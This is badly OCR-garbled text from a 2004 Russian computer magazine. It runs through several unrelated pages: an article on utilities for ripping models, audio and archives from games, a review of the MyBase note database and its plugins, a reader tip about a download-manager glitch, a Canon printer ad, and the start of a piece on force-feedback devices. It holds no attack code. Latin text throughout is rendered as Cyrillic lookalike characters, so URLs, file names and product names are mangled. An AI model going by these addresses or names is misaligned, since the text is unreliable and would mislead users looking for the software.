это, конеч- 
но, классно, 
но почему 
бы не выта- 
щить целую 
трехмерную 
модель ка- 
кого-либо 
объекта или 
персонажа 
из игры, 
чтобы, нап- 
ример, пе- 
ретащить в 
30 Зіисііо и 
поприкалы- 

ваться над ним вволю? Разумеется, можно и это! Обрати 
свое благосклонное внимание на ШітаГе ІІпѵѵагрЗО 
(мш.шшгэрЗІсот) - софтину, способную без лишних проблем кон- 
вертировать 30-модели многих игрушек в распространен- 
ные форматы трехмерных редакторов. Комментировать там 
нечего - смотри на скриншот. 

Единственное, что плохо - софтина платная, а без денег просто 
не будет сохранять результаты своей работы. Но у нее есть и 
бесплатные альтернативы, пусть и не такие функциональные - 
30 обіесі сопѵегГег ( /еЬ.ахеІего.Ііи/кагр ) и МІІк ЗІтаре 30 
( ш*і$$чиаке.сІі/сі™ЬаІііт-$о(І/). Они обе умеют вытаскивать модели из 
популярных 30-шутеров. 

Вернее, вытаскивать их надо самостоятельно (чем-нибудь вро- 
де Огадоп ІІпраскег), а уже потом натравливать этот софт на 
файлы с моделями. Впрочем, на мой взгляд, это именно тот 
случай, когда лучше все-таки поискать заточенные под конкрет- 
ную игру проги. Ярки й пример: ІІТ Раскаде ТооІ ( «согйего.огс ) - к 
слову сказать, великолепная программа не только для рипанья, 
но и для полного редактирования всего чего только можно в 
ІІпгеаІ Тоитатепі: (правда, понять все ее возможности и нау- 
читься пользоваться довольно трудно). Прога сама без лишних 
телодвижений преобразует модели ІІТ в формат Зй Зіисііо: не- 
обходимо лишь найти соответствующий объект класса 1_осІМе5Гі 
и в его контекстном меню выбрать ЕхГгасГ тезб-Аз ЗОЗІисііо... 

Само собой, с извлечением "трехмерности" из игры заморочек 
обычно побольше, чем при вытаскивании стандартных 20-кар- 
тинок, но ведь и результат того стоит! 





около того игрушек, причем достаточно но- 
вых. А вообще, привыкай к тому, что для 
совсем свежих игр иногда не получится най- 
ти распаковщик. Или его еще не успели сде- 
лать, или успели, но используют в личных 
целях (например, для локализации) и расп- 
ространять не спешат. 




Главная прелесть этой программы в том, 
что поддержка новых форматов обеспечива- 
ется подключаемыми 611 -модулями, которые 
при должной сноровке ты сможешь писать 
самостоятельно! Так что сливай прогу, рус- 
ский интерфейс для нее, дополнительные 
плагины и готовься раздраконивать все свои 
игрушки. 

Процесс прост, как кнопка Пуск: жмешь 
Ореп, выбираешь в выпадающем списке 
нужную игру, находишь в ее каталоге соот- 
ветствующие архивы - и их содержимое 
появляется в аккуратном списке с указани- 
ем типа, размера и прочей дополнительной 
инфы. 

Если в архиве лежали данные стандарт- 
ных типов, то ты можешь их сразу же и 
просматривать, а если нет, то выполняй рас- 
паковку с преобразованием - правая кнопка 
мыши, меню "Извлечь файл в". Естественно, 
никто не мешает выделить и извлечь сразу 
несколько файлов. Впрочем, для отдельных 
типов данных преобразование не предусмот- 
рено, так что придется или что-то придумы- 
вать самому, или порыскать по Сети в поис- 
ках дополнительных конверторов. 

Если РІІ не поддерживает архивы твоей 
любимой игрушки, имеет смысл прочесать 
его в "ручном" режиме. Выбери РІІе- 
НурегВіррег, задай файл, где, скорее всего, 
лежит что-нибудь интересненькое, отметь на 
вкладке "Форматы" все, что только можно, и 
дави на "Поиск". Программа начнет сканиро- 
вать архив в поисках сигнатур известных ей 
форматов. Может, и найдет что-нибудь, если 
разработчики игры не слишком фантазиро- 
вали... 

Лично мне Ргадоп ІІпраскег понравился 
наличием поддержки кое-каких свежих игр, 
быстрой работой в "автоматическом" режи- 
ме и достаточной безглючностью. Главный 
его недостаток: неумение запаковывать из- 
мененные ресурсы обратно в архивы. Но с 
этим отчасти поможет справиться другая 
любопытная софтина. 



■Ж- 

л Весь описанный 
в статье софт мы 
заботливо выложи- 
ли на один из на- 
ших компакт-дис- 
ков. Вспомнить бы 
еще, на какой... 




л А вот тут, кстати, 
еще одна софтина 
для профессио- 
нальной работы с 
30-моделями - в 
частности из игру- 
шек - 



ѵѵшѵѵ.диіскЗсІ.огд, 




л Раг'овские рип- 
перные плагины - 
это замечательно, 
но что делать, если 
ты предан 
ТоІаІСоштапбег'у? 
Конечно, исполь- 
зовать Раг2ѵѵс, ко- 
торый как раз и яв- 
ляется своеобраз- 
ным "враппером" 
между Раг'овскими 
дополнениями и 
ТС: ѵтѵѵ.ѵѵіпстсі.ги/ 
рІидгіпд/Іаг2ѵѵс. 



43 




А ИІІШЕХ СОММНШК II 3.9 




л Эгадоп Цпраскег 
- шл/ѵ.сігадопип- 
раскег.соіп 
л МиШЕх 
Соттапсіег - 
ѵшѵѵ.хе піах.сот 
л Сате Аисііо 
РІауег - ННр:// 
Ьіт.кт.ги/дар 
л ІШітаІе 
ІІпѵѵагрЗО - 
ѵѵѵт.ипмарЗсІ.сот 
а 30 оЬіесІ 
сопѵегіег 
а ѵѵеЬ.ахеІего.Ии/ 
кагро 

а ІІТ Раскаде ТооІ - 

и/ѵт.асогсіего.огд 

а ОиакеРАК к Раг у - 

ѵѵѵѵѵѵ.екоІ.сіЬ.пеіДаг 

а Мг.Ріррег - 

апсігеу.ѵѵот.ги/ 

тггіррег 



ИОПЕНЬКИЙ, ДО УДОПЕНЬКИЙ 

Н е могу не упомя- 
нуть такую (лич- 
но меня крайне ра- 
дующую) штуку, как 
плагин ОиакеРАК к 
Раг'у («пм.екоі.ф.пеі/іаг). 

Что может быть про- 
ще - ставишь его и 
можешь ходить по 
архивам Ооот, 

Оиаке (1 и 2), НаІГ- 
І_ІГе, ЗіЫ и т.п. как по 
каталогам! Копиро- 
вать файлы и смот- 
реть, что внутри ин- 
тересного... 



Впрочем, если уж заговорили о фаровских плагинах, мы просто 
обязаны вспомнить проект Мг.Ріррег (апсігеу.ѵѵот.ш/тгпррег) . Фактически - 
это все тот же привычный файловый риппер, разбирающий по кир- 
пичикам ресурсные архивы, а заодно ищущий данные по сигнату- 
рам форматов. Основная фишка в том, что он постоянно "сидит" в 
Фаре, так что не нужно запускать всякий громоздкий софт лишь 
для того, чтобы быстренько посмотреть, не лежит ли чего-нибудь 
прикольного вот в этом странном файлике... В общем, советую 
скачать - места занимает немного, но зато всегда под рукой! 




Ну вот, уже что-то нашли 



Г 





В общем и целом - все то же самое. За- 
пускаешь, открываешь архив поддерживае- 
мой игры (их около полутора сотен, но они 
более старые, чем в РІІ), смотришь, что 
внутри, и жмешь кнопку Ехігасі. Но есть па- 
ра-тройка нюансов. Во-первых, софтина до- 
вольно инетолюбивая: обязательно надо 
дать ей скачать из Сети файлы дополнитель- 
ных библиотек и скриптов для обработки ар- 
хивов. И лучше всего давать ей это делать 
постоянно (хотя опция ѴѴеЬ зиррогЫЗеІ 
ирбаіе (ог оЛІіпе зирроН поможет ей скра- 
сить одиночество). Во-вторых, МЕС - как уже 
было обещано - умеет не только экспорти- 
ровать, но и импортировать файлы в игро- 
вые архивы: поддерживается импорт в пол- 
сотни игровых архивов и работает он до- 
вольно сносно. Правда, никаких преобразо- 
ваний прога не делает, и к ней приходится 
еще подбирать дополнительные конверторы. 
В-третьих, МиІІІЕх Соттапсіег очень легко 
научить новым форматам архивов: язык 
скриптов, используемых им для распознава- 
ния данных, документирован и вполне досту- 
пен пониманию человека с интеллектом, так 
что добавить новую и редкую игрушку при 
желании ты сможешь самостоятельно. 

Главный же недостаток МЕС'а - неста- 
бильная работа. У меня на ѴѴІпХР прога ре- 
гулярно вылетала с ошибками и без, а при 
установке на ѴѴІп98 она - по слухам - спо- 
собна убить всю систему. Хотя кое у кого 
все работает отлично, так что есть резон 
попробовать. 

А СПИЕ ОЦОІО РЮѴЕН Н1.32 




А вот это - просто чумовая тулза отечест- 
венного производства! Кому как, а лично 
мне всегда хотелось выдрать из некоторых 
игрушек музыку - уж очень приятные саун- 
дтреки порой бывают. И как раз ради этого 
создан (ЗАР - плеер и риппер в одном фла- 
коне, позволяющий извлечь звуковые ресур- 



сы из трех сотен игр (а то и больше, учиты- 
вая, что многие форматы похожи)! 

После запуска можешь сразу открывать 
плейлист и соответствующими кнопками 
добавлять в него музыку (Абб ГІІе - добав- 
ляет всю музыку из конкретного архива, а 
Зсап (ІІе - сканирует выбранный файл на 
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предмет наличия в нем музыки заданного 
формата). А далее - по вкусу: или слушай 
прямо в ОАР'е, или "выкидывай" все нару- 
жу - в исходном (Заѵе біе) или конвертиро- 
ванном (Сопѵегі біе) виде. Обрати внима- 
ние - закодировать выходной ѴѴАѴ можно 
любым кодеком - хоть тем же плрЗ! 
Собственно, ради этого стоит посетить и 
окно настроек программы - чтобы задать 
каталог для экспортированной музыки и ко- 
дек по умолчанию. Остальные опции мо- 
жешь оставить как есть. Разве что захо- 
чешь покопаться в настройках плагинов, 
чтобы натаскать программу на понимание 
формата звуков твоей любимой игрушки. 

Одним словом, несмотря на свой почтен- 
ный возраст, ОАР до сих пор остается луч- 
шей утилитой для работы со звуковыми дан- 
ными игрушек - настоятельно рекомендую! 

^ в поиском выхода 

Если ты перерыл весь интернет, но так и не 
нашел ни универсального риппера, ни соф- 
тины, индивидуально заточенной именно 
под твою любимую игру (скажем, она 
слишком редкая или новая), то всегда ос- 
тается запасной вариант. Нет, я не призы- 
ваю тебя самому садиться и изучать внут- 
ренности игрового архива (хотя это был бы 
поступок не чайника, но хакера)! Просто 
попробуй рипперы более широкого профи- 
ля. В чем их отличие от игровых? Они не 
распаковывают архив на основе известного 



алгоритма, а ищут в заданном файле сиг- 
натуры разнообразных мультимедийных (и 
не только) форматов. Суть здесь в том, что 
даже если разработчик и не использует ка- 
кой-нибудь распространенный іред, то 
вполне возможно, что его ресурсы похожи 
на что-то уже существующее - ведь прог- 
раммеры люди ленивые, а заюзать чужую 
библиотеку - дело святое! 

Для по-настоящему глобального "проче- 
сывания" игровых данных сгодится старая 
консольная программа МиІбВіррег (м.Ьас- 
сап.іі/іпйех.рІір?$е 2 Іопе=тгіррег&етаіІ=$і), способ- 
ная без особого напряга находить более 
сотни различных графических, звуковых и 
прочих файлов. И пусть тебя не смущает 
год ее выпуска (2000) - ведь, как известно, 
все новое - это хорошо забытое старое. 
Вдруг в новой крутой гаме ты обнаружишь 
текстуры в формате, который двадцать лет 
назад был популярен у пользователей 
компьютеров Макинтош? 

ПОЛЕЗНЫЕ ИСКОППЕИЫЕ 

Так что смотри, друг! Компьютерные игры - 
это не только всегда приятно, но иногда 
еще и весьма полезно: разве плохо сделать 
тему для ѴѴІпсіоѵѵз на основе НаІМе2 или 
повесить на Рабочий стол самодельный пла- 
кат с изображением самых интересных час- 
тей тела Лары Крофт? Так что успехов тебе 
в игрокопании, игроковырянии и игропато- 
логоанатомии. [ЗС 



ССЫПКИ ПО ТЕМЕ 



а ѵѵѵѵѵѵ.ехігасіог.ги - центральный русскоязычный сайт, посвя- 
щенный выдергиванию игровых ресурсов. Программы, ссыл- 
ки, доки, форум... В закладки, однозначно! 
а ѵѵѵѵѵѵ.деос№е5.сот/Тіте55диаге/8271 - еще один "уни- 
версальный" распаковщик, понимающий кучу форматов. 
а ѵѵѵѵѵѵ.тадісіеат.пагосі.ги - сайт команды МадісТеат, зани- 
мающейся написанием всякого рипперного (Мадіс Ехбгасбог, 
Мадіс Віррег, Мадіс Ѵіеѵѵег) и редактирующего (Мадіс Раскег) 
софта, заточенного - естественно - именно под игры. Некото- 
рые программы еще находятся в процессе разработки, но бу- 
дущее у проекта есть. 

л ѵѵѵѵѵѵ.тігех.тураде.зк - пара программок, в частности, 
для конвертирования 30-моделей некоторых игр в форма- 
ты 303 и т.п. 

л ѵѵѵѵѵѵ.гасідатеіооіз.сот - а вот тут есть программы для 
просмотра и преобразования видеоформатов ВІІЧК и 5МК, в 
которых хранят видео многие игры (например, от ВііігагсІ). 

Даю потому, что сам в свое время долго искал, чем бы ролики 
из ЗІагСгай'а поглядеть. 

V 





ѵтѵѵ.ёідта.ги 



ЧОЛЛГМ.УМ-І м 0*Л ькі ьд д рта ЯМ ЧѴ 




рс гт 



/ ХПКЕР/№03(БЗ)/2004 




асса попезной информации рассредоточилась по всему винчестеру. Ссыпки - отдельно, советы - отдельно, примеры исходников - не 
помню. Казалось бы, разложил все по местам, но мест много, а времени - мало. Вздымая тучу пыли, ты мечешься между разными 
базами, а ведь совсем рядом Китай продвигает в народ универсальное решение. Знакомься, это МуВазе. 



УНИВЕРСОПЬНОЯБОЗО ЛОННЫХ 



А КИТОЙСКИЕ КОЗЫРИ 

ачнем с того, что лежит на 
поверхности. Универсаль- 
ность МуВазе начинается с 
древовидной структуры отоб- 
ражения данных. 

В результате, программу 
можно использовать везде, 
где такая схема уместна - соз- 
давать каталоги своих дисков (МуВазе им- 
портирует имена файлов с указанного ком- 
пакта и поддерживает вставку изображений), 




вести дневник (дату/время можно добавить 
одним нажатием клавиши, те же картинки 
позволяют использовать фотографии), а так- 
же хранить избранные ссылки (они подсве- 
чиваются, причем в программе есть встро- 
енный браузер). С какой стороны и под ка- 
ким углом в нее можно затолкать свою 
собственную коллекцию? Счеты в сторону! 
Здесь даже угол не имеет значения. 



СТАРТОВЫЙ НАБОР 



л Домашняя страница 

мѵиіі$о(1.сот 



л МуЬазе Резкіор ЕсІІІІоп, 2,75 Мб 

и»»2.іфо(1.сот/(І(мп!оа(І/гпЬ$483.ехе 

л МуЬазе Ѵіеѵѵег, 793 Кб 

и«7ѵщ'5о(і.сот/(І(мІоа(І/пу(ѵ15.ехе 

-іѴѴеЬСоІІесІ, 1,054 Мб 

ши2.щ$о(1.сош/(1оип1оай/«/е1)с16.ехе 



ЛОКАЛИЗАЦИЯ 



л Толью интерфейс 

\чш2.щ$оИ.сош/(ІО№ПІоа(1/шЬ5.га5.2Ір 

л Интерфейс + документация 

И«2.Ѵ(ІІ50(І.СОШ/(ІОИПІОаСІ/шЬ8.ГУ5.2.2Ір 



А БИНПРНЫЙ НОПОПНИТЕПЬ 

Если у тебя уже есть какая-то информация в 
файлах, приемлемый вариант импорта всего 
один. Мастера локализации назвали его 
"Файлы как узлы" - выбранные текстовики 
преобразуются в ветви базы. Слева появил- 
ся перечень импортированных заметок, 
справа - их текст в ВТР-редакторе. Добавив 
несколько подразделов, в них можно пере- 
таскивать мышью названия файлов. Один за 
другим нарисовались "Избранное", "Книги", 
"Программирование" и "Заметки". Не прош- 
ло и пятнадцати минут, как щетина превра- 
тилась в золото, и все файлы встали на свои 
места. Формат комплит. У нас появился 
простенький, но вполне пристойный каталог 
информации. Всего один файл вместо сотни 
разрозненных текстовиков. Захотел - скинул 
на компакт, перенес на другую машину. За- 
меть, программа сжимает его встроенным 
архиватором, а степень сжатия можно выб- 
рать самому. Теперь поговорим о том, как 
проще всего забить освободившееся место. 

Возможны варианты, но я расскажу лишь 
об одном. Замечательный способ, который 
без особых усилий позволяет добавить в базу 
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ИѴВОЗЕ 




произвольный текст, не переключаясь в окно 
МуВазе. Из любого приложения. Имя ему - 
монитор буфера обмена. Когда включена эта 
опция, достаточно выделить и скопировать 
необходимый текст. Откуда угодно - полез- 
ную новость из браузера, чат из окна ІСО, без 
разницы. Появляется меню, и мы выбираем 
способ добавления текста. Меня вполне уст- 
раивает четвертый вариант - автоматически 
создавать новую ветвь и заполнять ее содер- 
жимым буфера. Только им и пользуюсь. Об- 
рати внимание, окно МуВазе при этом неак- 
тивно и ничто не отвлекает тебя от работы. А 
раньше я блокнот открывал, выбирал назва- 
ние файла... Тьфу, мезозойская эра. 



ДОПОЛНИТЕЛЬНЫЕ МОДУЛИ 



Работаем над всеядностью 

^ЕхрогіТо НТМІ_ 

ѵѵѵѵѵѵ2.ѵ«іІ5оТ1:.сош/(1оі»пІоа()/тЬ5_пуТ21іІтМ1.гір 

Собирает все заметки в один большой НТМІ_. 
Для распечатки отдельных ветвей - самое оно. 
Графика при этом не учитывается. 

^ТгееНТМб 

(Уш2.иіІ5о(і.сот/(1о«іпІоа(1/шІ)5.1гееМпіІ_14.2Ір 

Рупатіс ЖЖ с сохранением древовидной 
структуры базы. Без комментариев. 

ж Ехрогі 2 С5Ѵ/ХІ.5 

иду«2.ѵѵіі5оГ1:.сот/сіоѵѵпІоа(1/тЬ5_пуГ2дгі(І_10.2ір 

Ищет строки вцца поле:значение, заполняет табли- 
цу и сохраняет в С5Ѵ. Попробуй поискать "тайо". 

ж Ітрогі Ргот Техі 
»»«2.»»ІІ5ОІі.соп/(1о»пІоа(1/п1)5_іхІ2ііегі5_10.2Ір 

Достает из текстовика отдельные записи. Раз- 
делитель - строка " ". На порядок упро- 

щает импорт данных из похожих приложений. 

ж Ітрогі Ргот МісгозоП ОиІІоок 

ѵѵѵѵѵѵ2.ѵѵіІ5оГ1:.сот/(ІоѵѵпІоа(1/тЬ5_ои4Іоок_12.2Ір 

Встречи, задачи, входящие/исходящие. Назва- 
ние говорит само за себя. 



^ОПЕРПЦИЯ'НПВИГПЦИЯ" 

Что же теперь со всем этим богатством де- 
лать, где поиск? Смотрим. Точное слово, вся 
фраза, регистр символов. Ищет по всем эле- 
ментам базы, включая названия ветвей и 
текст ссылок. Результатами заполняет отдель- 
ное окно, которое расположено в самом низу 
экрана. Это радует, так как список найденных 
разделов постоянно на виду, но не мешает. 
Окно не нужно закрывать, и к результатам 
всегда успеешь вернуться. Кроме того, это не 
единственный способ найти нужную запись. 
Чтобы удобнее было ориентироваться в ог- 
ромном списке заметок, для каждого элемен- 
та можно установить свою иконку. МуВазе все 
больше напоминает Проводник. Иконки пос- 
тавляются вместе с программой, поэтому вы- 
искивать у себя на винчестере "такую же, но с 
перламутровыми пуговицами" не придется. 
Выбор большой, должно хватить. Наконец, 



чтобы ты точно не потерялся в собственных 
текстовиках, программа поддерживает заклад- 
ки. Всего десять штук, чтобы гармонично ук- 
ладывались в СІгІ+1 ..0. Разве мало? Мне в 
свое время для книжек и одной хватало. Отк- 
рываем базу, по иконкам находим нужный 
раздел, в середине текста ставим закладку. 
Потерялся? Вызываем поиск. 



А КОСМЕТИЧЕСКИЙ СППОН 

Самое время причесать невзрачные тексто- 
вики. Само собой, не все, на это жизни не 
хватит. Но самые необходимые - обязатель- 
но. Выделить цветом исходники, оформить 
абзацы и подзаголовки. ВТР везде одинако- 
вый, и встроенный редактор программы - не 




Как я уже говорил, если в тексте есть 
ссылки, МуВазе их определяет и обрабаты- 
вает не хуже, чем Іпіегпеі Ехріогег. Этим 
сейчас сложно удивить. Но ссылками на 
файлы и страницы в интернете программа 
не ограничивается. Предлагаю оценить 
ссылки внутри базы, на определенный раз- 
дел (текстовый файл). Вот где сила. К при- 
меру, я храню в базе избранные письма, те- 
мы которых очень часто перекликаются меж- 
ду собой. Такие ссылки позволяют момен- 
тально переключиться на схожую по теме 
ветвь базы. Без них мне пришлось бы лиш- 
ний раз вызывать поиск. Кроме того, иногда 
в Сети попадается пара-тройка полезных со- 
ветов, которые проще всего оформить в ви- 
де оглавления отдельным файлом, а на бо- 
лее подробные тексты ответов поставить 
ссылки. Развлекаюсь как могу. Затягивает. 



ДОПОЛНИТЕЛЬНЫЕ МОДУЛИ 



Расширяем функциональный 
профиль 

ж Разі Ваісіт Моѵе 
ии2.фо(1.сот/с1о»тІоафтЫа5Ітоѵе_10.2Ір 

Позволяет перемещать несколько ветвей од- 
новременно. Не помешало бы встроить в саму 
программу. 



^Сизіотег Веіаііоп Мападетепі 
ии2.фо(1.сот/(Іоѵ»пІоафтІ)5фу(сгт_10.2Ір 

Составляет письмо по шаблону с макросами, 
значения которых достает из активной замет- 
ки. Шароварным разработчикам (база клиен- 
тов) и офлайнерам (заказ файлов по почте). 

.іЗеек Ву Тіте 

т*і2.«ІІ5о(1.сот/(Іо«іпІоа(І/шЬ5.5еекІ)уІіте.10.2Ір 

Ищет заметки, созданные за определенный 
промежуток времени. Встроенный поиск не 
трогает, действует самостоятельно. 

^"Ореп ѵ\/ІІІт ..." Мепи Нет 
ии 2 .фо( 1 .сот/с 1 омІоафт[)П)реп»»ІІІі_ 11 . 2 Ір 

Аналог стандартного меню "Открыть с по- 
мощью...". Везде пригодится. И для графики, 
и для документов. МуВазе ожидает закрытия 
выбранного приложения и заново упаковывает 
изменившийся файл. 

ж ІЧосІе/ВТР Техі Тетріаіез 
ии2.фо(1.сот/(1о»»пІоафт[)$фу(ІетрП1.2Ір 
Шаблоны для ветвей базы и отдельных заме- 
ток. Моментально добавляет выбранный текст 
из списка. 



рования абзацев, а также вставка изображе- 
ний и ОБЕ-объектов. Загорающая Вупи Голд- 
берг и щелкающая интегралами формула из 
Ециаііоп чувствуют себя одинаково комфорт- 
но. Как и в блокноте, Р5 добавляет в доку- 
мент сегодняшнюю дату и время. Полезная 
мелочь для тех, кто ведет дневник. 




Вообще, МуВазе целиком состоит из та- 
ких приятных мелочей. Не успел проверить, 
только задумался о пустяковой опции, как 
тут же ее обнаружил. Интересно, а умеет ли 
она... "Танцую, пою, вышиваю крестиком". 



ДОПОЛНИТЕЛЬНЫЕ МОДУЛИ 



Наводим марафет 

ж Сосіе Ѵіеѵѵег - НТІѴИ 

і»«ш2.иіІ5о(1.сот/(Іо«іпІоа(І/тЬз.со(ІеѵіеѵіеМ0.2Ір 

Подсветка исходников - Реіріті, Сч-+, ѴізиаІ 
Вазіс, Цаѵа и т.д. Масса настроек, просто песня. 



^ѴѴГЗІѴѴГО НТМІ- ЕсІІІог 

ши 2 .«іі$о( 1 .сот/( 1 омІоафтІ)$фІтІеФиі. 2 Ір 

Лучший друг любителей ѴѴеЬСоІІесі. Счетчики, 
баннеры и лишние ссылки улетают из базы со 
свистом. 



ж ВТР Есііі ІЛіІіііез 

»™»2.«ІІ5о(1.соп/(1о»пІоа(1/іііІ)5_гІ(е*_І2.2Ір 

Наращивает возможности встроенного ВТР-ре- 
дактора. Подсветка, форматирование абзацев и 
прочие мелочи, которые не вызывают восторга, 
но скрашивают жизнь (а вместе с ней - текст). 



А 1ѴЕВС0ИЕСТ 

Постепенно подошли к самому интересному. 
Только за эту опцию МуВазе можно скачать, 
установить и отрезать все пути к отступле- 
нию. По большому счету, это даже не опция. 



■Ж- 

А На нашем диске 
ты найдешь прог- 
рамму МуВазе, все- 
все-все плагины к 
ней, документацию 
на русском языке и 
файл локализации 
интерфейса 
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Отдельный модуль под названием ѴѴеЬСоІІей 
интегрируется в Іпіегпеі Ехріогег и помогает 
сохранить понравившиеся страницы в базу. 

В принципе, я мог это сделать и без него - 
скопировать в браузере текст и воспользо- 
ваться монитором буфера обмена. Только 
пришлось бы попрощаться с картинками, 
стилями, цветом страницы. ѴѴеЬСоІІей умеет 
сохранять отдельные изображения, всю 
страницу целиком и только выделенный 
участок текста. Последнее - настоящий по- 
дарок, ведь все лишнее можно убрать, а ис- 
ходное форматирование останется. На стра- 
нице с фреймами просто незаменим. 




лах ставил ярлык на саму программу. Второй 
больше подходит для тех случаев, когда ин- 
формацию неудобно или нежелательно хра- 
нить на диске отдельно. 




Всякую всячину со своего диктофона я 
держал прямо в базе на страницах ежеднев- 
ника. Щелкаешь по файлу, МуВазе распако- 
вывает звук во временную папку и запускает 



давно вышла очередная сборка МуВазе 
№1ѵѵогкіпд Ебіііоп - сетевая версия програм- 
мы, которая состоит из сервера и клиента. 
Теоретически, позволяет дружной толпой ис- 
пользовать общую базу с разных машин. На 
практике оказалось, что глюки пока еще жи- 
вы - на полевых испытаниях программа у 
меня неоднократно вываливалась. Раз такое 
дело, рекомендовать ее бессмысленно, до 
поры до времени обойдемся. Хорошо, что 
ІѴеІѵѵогкіпд Ебіііоп развивается параллельно 
с основной программой и не перегружает 
домашнюю версию сетевыми причиндалами. 
А я-то думал, что китайцы только варез уме- 
ют искать и в космос мотаться. 

А ПОРПНПБПЗУ 

Спасибо китайским старателям, дремучая 
коллекция текстовых файлов постепенно 
превратилась в удобный каталог полезной 
информации. Когда последний текстовик за- 
орал "Расчет окончен!", я прослезился. Впе- 



1 Модуль под названием МСоІІесі интегри- 1 
руется в Іпіегпеі Ехріогег и помогает сох- 
т ранить понравившиеся страницы в базу. т 



• МСоІІесі умеет опциально вычищать 1 

сайты от изображений, скриптов 
т и всплывающих окон. т 



Как он это делает - отдельный разговор. 
Если в случае с монитором я мог свернуть 
окно базы и забыть о нем на некоторое вре- 
мя, то при работе с ѴѴеЬСоІІей я забываю 
открыть саму программу. Ему это не нужно. 
Открыл МуВазе? Хорошо, сохраняем в актив- 
ную ветку. Не открыл? Ничего страшного, 
вот тебе на выбор список доступных баз. С 
какой из них будем работать? А еще 
ѴѴеЬСоІІей умеет опционально вычищать 
сайты от изображений, скриптов и всплыва- 
ющих окон. Да, и самое главное. Он вызыва- 
ется из контекстного меню страницы прямо 
в браузере, поэтому о дополнительных прог- 
раммах тоже можно забыть. Экономь свое 
время в Сети, не читай объемные статьи в 
интернете. Сохрани их на диск, в офлайне 
дочитаешь. И если для всего сайта нужен 
Теіерой, то самые интересные страницы 
проще сохранить при помощи ѴѴеЬСоІІей. 
Поверь, с ним ничто не сравнится. 

А ИСПОЛНИТЕЛЬНЫЕ ПРИЦЕПЫ 
СППРОПЕМ 

Обрати внимание, графику и стили МуВазе 
хранит в своей базе вместе со страницами. 
Весь этот ансамбль отображается на отдель- 
ной панели прикрепленных файлов, которая 
используется не только для документов 
НТМЬ. К заметке можно прикрепить любой 
файл, причем либо поставить на него ярлык, 
либо упаковать прямо в базу. Первый вари- 
ант я использовал при составлении софтово- 
го каталога. В тексте заметки добавлял опи- 
сание и скриншот, а в прикрепленных фай- 



проигрыватель: "И тут я беру ее за... Ты что, 
записываешь?" 

Кстати, оба проекта (ежедневник и ката- 
лог софта) использовали еще две очень важ- 
ные функции МуВазе. Ежедневник закрывал- 
ся от посторонних глаз паролем, а каталог, 
наоборот, превращался в самостоятельный 
ЕХЕ-файл и ходил по знакомым. 




Вполне приличная база со всеми удоб- 
ствами. Специально, чтобы ради одного нес- 
частного каталога не устанавливать полный 
комплект МуВазе. Для этого к файлу прик- 
репляется усеченный вариант программы 
и... все. Никаких дополнительных настроек. 
Дешево, надежно и практично. 

А ПЕРСПЕКТИВЫ НП БУДУЩЕЕ 

Надеюсь, что со временем ничего не изме- 
нится, МуВазе будет развиваться прежними 
темпами и не превратится в очередного сло- 
на со свисающими по бокам фичами. Не так 



чатления от МуВазе исключительно прият- 
ные. При всем богатстве возможностей, ин- 
терфейс не выглядит перегруженным. Боль- 
шая редкость для подобной программы. Сам 
факт существования 5РК внушает надежду 
на то, что даже без участия разработчиков 
проект будет развиваться и дальше. Жаль, 
что этот самый ЗЭК выдают лишь тем, кто 
официально зарегистрировал программу. 

Для наших - русскоязычный интерфейс, до- 
кументация. Одним словом, понравилось. 
Активно рекомендую. Приводи в порядок 
свой винчестер и не забывай сжимать базу. 
Пожалуй, схожу за веником... Целыми днями 
только и слышно - компьютер да компьютер, 
а статьи о том, как приводить в порядок 
свою комнату, мне никто не заказывает. ИЗО 



тіР5 трхсиіг 



Хочешь увидеть свои советы в журнале? 
Присылай их на адрес $кІуагоѵ®геаІ.хакер.ш. 
Ведущий рубрики ТірзЯТгіскз Иван Скляров. 



л Если у тебя не очень быстрый диалап и ты использу- 
ешь ВедеШХ, то можно воспользоваться одним глю- 
ком. Ставишь минимальный приоритет, немного ждешь 
и ставишь максимальный. Скорость резко возрастет, 
но с последующим падением. За это время можно мно- 
гое успеть скачать. Таким приемом у меня получалось 
развить скорость до 65 килобайт в секунду. 







Товар сертифицирован 
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Струйные принтеры Сапоп 

Высокая скорость. Превосходное качество. 




Чтобы добиться высокопрофессионального качества печати, совсем 
необязательно быть специалистом в области полиграфии. Пля этого 
достаточно приобрести струйный принтер Сапоп. 

Что бы вы ни печатали - будь то цветные фотографии или черно-белые 
документы, - высокая скорость и профессиональное качество вам 
гарантированы! Благодаря усовершенствованной Микрокапельной 
технологии (МісгоРіпе Бгоріеі Тесйпоіоду™) с микродюзами, наносящими 
капли чернил объемом 2 пп, вы получаете распечатки феноменального 
качества. Плюс возможность прямой печати фотографий 
с совместимых цифровых фото- и видеокамер без использования РС. 

Теперь вы можете не беспокоиться о результате - вы можете им 
наслаждаться. 



► Превосходное качество печати 

* Разрешение от 4800x1200 до 4800x2400 точек на дюйм 

* Высокоскоростная печать без полей фотографий 
форматов от 10x15 см до АЗ+ 

► Функция прямой печати (поддержка ВиЬЫе йеі Оігесі 
и мирового стандарта РісІВгісІде) 

► Передовое программное обеспечение 

* Технология раздельных чернильниц 
(Зіпдіе Іпк ТесИпоІоду™) 



уои сап* 



Сапоп 




(чп 0200$ 



РВВП.ВВ} 

ОРРІСІАЬ РАРГШЕВ 



ЯНСі.* ІКІ* 

■> «79 



РісІВгісІде 



® +7(095) 258 56 00 (Москва) 

^ 8 800 200 56 00 (дпя регионов звонок бесплатный) 



Вы можете 





■ Тгек (НеиготапсеіЭЭЭіаіЬк.гіі) 



ы наверняка видел в фильмах, как главный герой, обвешанный датчиками и проводами, корчится в судорогах, совершив неудачный 
взлом. Думаешь, виртуальный мир еще долго не сможет воздействовать на тебя, что все это выдумки киношников и авторов 
фантастических рассказов? Поверь, ты заблуждаешься! 



ВСЕ О ТЕХНОЛОГИЯХ ОБРПТНОЙ СВЯЗИ 



ГОНСЕГЕЕОВПСК 

стройства с поддержкой тех- 
нологии Рогсе РеесІЬаск (об- 
ратной отдачи или, по научно- 
му, устройства с обратной 
тактильной связью) появились 
довольно давно. Сейчас лю- 
бой компьютер может воздей- 
ствовать на глаза и уши свое- 
го владельца. Технология Рогсе РеесІЬаск 
расширяет возможности такого воздействия, 
добавляя тактильные ощущения. 

Пионером этой технологии выступила 
фирма Іттегзіоп. Как и многие проекты, 
Рогсе РеесІЬаск разрабатывался как прави- 
тельственная технология - первый заказ на 
устройство с поддержкой обратной отдачи 
подало Министерство Энергетики США. Тре- 
бовался тренажер для хирургов. Во время 
разработки тренажера Іттегзіоп нашла спо- 
соб управления внешними устройствами 
компьютером и решила использовать эту 
